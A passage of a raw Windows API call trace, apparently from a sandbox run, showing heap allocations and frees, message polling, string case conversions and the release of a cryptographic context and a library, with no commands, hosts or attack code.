wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.587] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.587] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.587] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.591] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.591] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.591] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0198.591] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.592] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0198.592] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.592] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0198.592] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.592] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.592] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.592] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.592] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.593] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.593] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0198.593] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0198.593] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.593] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.594] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.594] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.594] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0198.594] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.594] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.594] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.594] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.594] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.595] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.595] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.595] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.595] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.595] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.595] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.595] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.595] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.595] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.595] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.595] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.595] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.595] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.595] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.595] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.595] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.595] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.595] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.596] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.596] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.596] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.596] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.596] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.596] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.596] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.596] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.596] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.596] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.596] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.596] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.596] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.596] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.596] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.597] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.597] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.597] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.597] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.597] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.597] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.597] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.598] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.598] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.599] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.599] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.599] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.599] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.600] FreeLibrary (hLibModule=0x74d40000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.600] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.600] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: 